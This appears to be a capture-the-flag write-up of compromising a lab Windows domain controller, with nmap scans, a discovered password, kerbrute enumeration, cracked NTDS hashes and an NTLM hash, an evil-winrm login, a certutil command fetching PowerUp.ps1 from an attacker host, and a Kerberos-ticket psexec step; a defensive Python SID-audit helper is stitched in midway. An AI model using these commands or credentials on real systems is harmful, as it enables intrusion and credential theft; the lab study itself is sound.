Date: Mar 27, 2025
Tags: Nmap, User Enumeration, Network Scanning
192.168.125.175
Nmap
└─# nmap -sT -p- --min-rate 5000 $ip
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-27 02:23 EDT
Nmap scan report for 192.168.125.175
Host is up (0.051s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
5985/tcp open wsman
9389/tcp open adws
49666/tcp open unknown
49668/tcp open unknown
49674/tcp open unknown
49675/tcp open unknown
49693/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 26.54 seconds
└─# nmap -sU -p- --min-rate 5000 $ip
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-27 02:23 EDT
Nmap scan report for 192.168.125.175
Host is up (0.053s latency).
Not shown: 65532 open|filtered udp ports (no-response)
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
Nmap done: 1 IP address (1 host up) scanned in 27.70 seconds
└─# nmap -Pn -n $ip -sC -sV -p- --open -oN nmap.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-27 02:24 EDT
Nmap scan report for 192.168.125.175
Host is up (0.050s latency).
Not shown: 65515 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-03-27 06:28:35Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: resourced.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: resourced.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-03-27T06:30:03+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=ResourceDC.resourced.local
| Not valid before: 2025-03-26T06:20:22
| Not valid after: 2025-09-25T06:20:22
| rdp-ntlm-info:
| Target_Name: resourced
| NetBIOS_Domain_Name: resourced
| NetBIOS_Computer_Name: RESOURCEDC
| DNS_Domain_Name: resourced.local
| DNS_Computer_Name: ResourceDC.resourced.local
| DNS_Tree_Name: resourced.local
| Product_Version: 10.0.17763
| System_Time: 2025-03-27T06:29:23+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49675/tcp open msrpc Microsoft Windows RPC
49693/tcp open msrpc Microsoft Windows RPC
49708/tcp open msrpc Microsoft Windows RPC
Service Info: Host: RESOURCEDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-03-27T06:29:28
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 318.97 seconds
139,445
V.Ventz:HotelCalifornia194!
We found this password in the enumeration above; let's try using it.
5985


Nothing found.
Domain Enumeration
Domain: resourced.local
Tried this in ldapsearch, but the credentials were rejected.
Let's find out whether the password belongs to another user.
../kerbrute_linux_amd64 userenum -d resourced.local --dc $ip users


I am certain this password does not work for any user.

But this password actually works for SMB login.





So we have ntds.dit and ntds.jfm, and we can crack the password hashes from them.
We cut out the hash part.

Administrator : ItachiUchiha888



resourced.local\L.Livingstone:19a3a7550ce8c505c2d46b5e39d6f808
We can use these credentials to log in to Windows via evil-winrm.

PE (Privilege Escalation)
certutil.exe -urlcache -f http://192.168.45.160:8000/PowerUp.ps1
Could not run PowerUp.





Here we have a SID ending in 519, which means it is an Enterprise Admin.
This privilege allows us to edit and write new properties on new machines.
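The RID check used above (last SID component 519 = Enterprise Admins), as an added audit helper written for these notes rather than taken from the original or from any tool on the page: it maps well-known domain and BUILTIN RIDs to their privileged group names and flags any principal whose token-group SIDs hit one. The sample SIDs and user names are constructed.

```python
import re

# Well-known domain RIDs (last SID component) that mean "privileged" on a DC.
DOMAIN_PRIVILEGED_RIDS = {
    500: "Administrator",
    512: "Domain Admins",
    518: "Schema Admins",
    519: "Enterprise Admins",
}
# Well-known BUILTIN groups with high privilege on a domain controller.
BUILTIN_PRIVILEGED = {
    "S-1-5-32-544": "Administrators",
    "S-1-5-32-549": "Server Operators",
    "S-1-5-32-551": "Backup Operators",
}
DOMAIN_SID_RE = re.compile(r"^S-1-5-21(?:-\d+){3}-(\d+)$")

def rid_of(sid):
    """Return the RID of a domain SID (S-1-5-21-...), or None for other SIDs."""
    m = DOMAIN_SID_RE.match(sid.strip())
    return int(m.group(1)) if m else None

def privileged_name(sid):
    """Map a SID to a well-known privileged principal name, or None."""
    sid = sid.strip()
    if sid in BUILTIN_PRIVILEGED:
        return BUILTIN_PRIVILEGED[sid]
    rid = rid_of(sid)
    return DOMAIN_PRIVILEGED_RIDS.get(rid) if rid is not None else None

def audit(lines):
    """Parse 'principal<TAB>group-sid' lines; return {principal: [privileged groups]}."""
    hits = {}
    for line in lines.splitlines():
        if not line.strip():
            continue
        principal, sid = line.split("\t", 1)
        name = privileged_name(sid)
        if name:
            hits.setdefault(principal, []).append(name)
    return hits

# Constructed sample: group SIDs found in two users' tokens (domain part is made up).
SAMPLE = """\
alice\tS-1-5-21-111-222-333-513
alice\tS-1-5-21-111-222-333-519
bob\tS-1-5-21-111-222-333-513
bob\tS-1-5-32-551
"""
```

Running `audit(SAMPLE)` reports alice as Enterprise Admins and bob as Backup Operators; 513 (Domain Users) is ignored.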



export KRB5CCNAME=./Administrator@[email protected]

Make sure the hosts file is correct.
sudo impacket-psexec -k -no-pass resourcedc.resourced.local -dc-ip 192.168.125.175

